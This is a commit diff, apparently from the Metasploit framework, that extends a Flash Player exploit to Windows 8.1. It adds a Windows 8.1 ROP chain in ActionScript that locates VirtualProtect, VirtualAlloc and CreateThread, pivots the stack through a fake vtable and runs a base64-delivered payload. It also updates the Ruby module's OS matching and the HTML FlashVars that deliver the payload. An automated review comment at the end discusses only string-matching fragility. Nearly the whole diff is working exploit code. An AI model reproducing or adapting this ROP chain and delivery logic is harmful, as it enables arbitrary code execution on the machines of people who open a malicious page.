Land support for Windows 8.1
commit
098f31c1da
Binary file not shown.
|
@ -30,12 +30,14 @@ package
|
|||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var os:String
|
||||
private var original_length:uint = 0
|
||||
|
||||
public function Exploit()
|
||||
{
|
||||
var i:uint = 0
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
os = LoaderInfo(this.root.loaderInfo).parameters.os
|
||||
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
|
@ -118,8 +120,9 @@ package
|
|||
return
|
||||
}
|
||||
|
||||
exploiter = new Exploiter(this, platform, payload, uv)
|
||||
exploiter = new Exploiter(this, platform, os, payload, uv)
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -11,6 +11,7 @@ package
|
|||
private var eba:ExploitByteArray
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var op_system:String
|
||||
private var pos:uint
|
||||
private var byte_array_object:uint
|
||||
private var main:uint
|
||||
|
@ -25,11 +26,12 @@ package
|
|||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(89698)
|
||||
|
||||
public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
|
||||
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
|
||||
{
|
||||
exploit = exp
|
||||
payload = p
|
||||
platform = pl
|
||||
op_system = os
|
||||
|
||||
ev = new ExploitVector(uv)
|
||||
if (!ev.is_ready()) return
|
||||
|
@ -133,12 +135,19 @@ package
|
|||
private function do_rop():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop()")
|
||||
if (platform == "linux")
|
||||
if (platform == "linux") {
|
||||
do_rop_linux()
|
||||
else if (platform == "win")
|
||||
do_rop_windows()
|
||||
else
|
||||
} else if (platform == "win") {
|
||||
if (op_system == "Windows 8.1") {
|
||||
do_rop_windows8()
|
||||
} else if (op_system == "Windows 7") {
|
||||
do_rop_windows()
|
||||
} else {
|
||||
return
|
||||
}
|
||||
} else {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
private function do_rop_windows():void
|
||||
|
@ -150,7 +159,6 @@ package
|
|||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
|
||||
var winexec:uint = pe.procedure("WinExec", kernel32)
|
||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
|
||||
var createthread:uint = pe.procedure("CreateThread", kernel32)
|
||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||
|
@ -182,14 +190,14 @@ package
|
|||
|
||||
// VirtualAlloc
|
||||
eba.write(0, memcpy)
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, 0x4000)
|
||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||
|
||||
// memcpy
|
||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, payload_address + 8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
|
@ -198,7 +206,7 @@ package
|
|||
eba.write(0, buffer + 0x10) // return to fix things
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
|
@ -207,6 +215,73 @@ package
|
|||
exploit.toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
private function do_rop_windows8():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_windows8()")
|
||||
var pe:PE = new PE(eba)
|
||||
var flash:uint = pe.base(vtable)
|
||||
var winmm:uint = pe.module("winmm.dll", flash)
|
||||
var advapi32:uint = pe.module("advapi32.dll", flash)
|
||||
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
|
||||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
|
||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
|
||||
var createthread:uint = pe.procedure("CreateThread", kernelbase)
|
||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
|
||||
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
|
||||
|
||||
// Continuation of execution
|
||||
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
|
||||
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
|
||||
eba.write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
|
||||
// Put the payload (command) in memory
|
||||
eba.write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// Put the fake vtabe / stack on memory
|
||||
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
eba.write(0, virtualprotect)
|
||||
|
||||
// VirtualProtect
|
||||
eba.write(0, virtualalloc)
|
||||
eba.write(0, buffer + 0x10)
|
||||
eba.write(0, 0x1000)
|
||||
eba.write(0, 0x40)
|
||||
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
|
||||
// VirtualAlloc
|
||||
eba.write(0, memcpy)
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, 0x4000)
|
||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||
|
||||
// memcpy
|
||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, payload_address + 8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
// CreateThread
|
||||
eba.write(0, createthread)
|
||||
eba.write(0, buffer + 0x10) // return to fix things
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
|
||||
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
exploit.toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
private function do_rop_linux():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_linux()")
|
||||
|
@ -241,8 +316,6 @@ package
|
|||
eba.write(0, "\x5f", false) // pop edi
|
||||
eba.write(0, "\x5e", false) // pop esi
|
||||
eba.write(0, "\xc3", false) // ret
|
||||
|
||||
// eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
|
||||
|
||||
// Put the popen parameters in memory
|
||||
eba.write(payload_address + 0x8, payload, true) // false
|
||||
|
|
|
@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:arch => ARCH_X86,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::LINUX ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_7
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda do |ua|
|
||||
case target.name
|
||||
|
@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
if target.name =~ /Windows/
|
||||
platform_id = 'win'
|
||||
|
@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/>
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
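Review bot: `os_name = target_info[:os_name]` in the second hunk is passed through unchanged to the `os=` FlashVars field in the third hunk, and the SWF side selects behaviour by comparing that string literally against `"Windows 8.1"` and `"Windows 7"`, so any change in how `:os_name` is normalised would silently break the dispatch; a comment on the assignment, `# forwarded verbatim; must equal the literals compared in Exploiter.do_rop()`, would record that cross-file dependency. The first hunk's `:os_name` lambda now accepts `WINDOWS_81`, but nothing in this file documents that the SWF only handles the two Windows names plus Linux, which the matcher could state in a one-line comment. The ERB template in the third hunk begins and ends outside the shown lines.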
|